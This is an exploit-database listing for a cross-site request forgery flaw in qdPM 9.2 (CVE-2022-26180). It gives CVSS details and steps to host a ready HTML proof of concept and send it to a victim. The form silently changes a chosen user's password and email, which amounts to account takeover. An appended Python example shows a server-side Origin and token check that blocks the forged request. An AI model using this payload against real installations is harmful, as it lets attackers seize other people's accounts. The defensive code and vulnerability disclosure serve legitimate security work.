qdPM 9.2 Cross Site Request Forgery

2022.04.07
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180

# ---------------

Steps to Exploit :
1) Make an HTML file of given POC (Change UserID field Accordingly) and host it.
2) send it to victim.

<html>
<title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
      <input type="hidden" name="sf&#95;method" value="put" />
      <input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
      <input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
      <input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
      <input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
      <input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
      <input type="hidden" name="users&#91;photo&#93;" value="" />
      <input type="hidden" name="users&#91;culture&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
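The server-side check that stops a request like the form above, as an added example that is not part of the original advisory and is not qdPM code: a state-changing request is refused when its Origin/Referer is another site or when it lacks a per-session token. APP_ORIGIN, TOKEN_FIELD, the secret and the session id are assumptions made for the illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

APP_ORIGIN = "https://pm.example.test"   # assumed deployment origin (constructed)
TOKEN_FIELD = "csrf_token"               # hypothetical field name, not qdPM's
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_token(session_secret: bytes, session_id: str) -> str:
    """Derive the per-session token the server embeds in its own forms."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(url: str) -> str:
    """Reduce an Origin or Referer header value to scheme://host[:port]."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.scheme and parts.netloc else ""


def check_request(method, headers, form, session_secret, session_id):
    """Return (allowed, reason) for one request."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    source = origin_of(headers.get("Origin") or headers.get("Referer") or "")
    if source and source != APP_ORIGIN:
        return False, f"cross-origin source {source}"
    expected = issue_token(session_secret, session_id)
    supplied = form.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed samples: a subset of the fields the PoC form posts, sent cross-site.
SECRET, SID = b"constructed-secret", "constructed-session-id"
POC_FORM = {"sf_method": "put", "users[id]": "1", "users[name]": "AggressiveUser",
            "users[new_password]": "TEST1122", "users[culture]": "en"}
FORGED = ("POST", {"Origin": "https://attacker.example"}, POC_FORM)
# Same fields with Origin/Referer stripped: the token check still decides.
NO_ORIGIN = ("POST", {}, POC_FORM)
# Submission from the application's own form, which carries the token.
GENUINE = ("POST", {"Origin": APP_ORIGIN},
           {**POC_FORM, TOKEN_FIELD: issue_token(SECRET, SID)})

if __name__ == "__main__":
    for name, req in [("forged", FORGED), ("no-origin", NO_ORIGIN), ("genuine", GENUINE)]:
        print(name, check_request(*req, SECRET, SID))
```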



Copyright 2022, cxsecurity.com

 
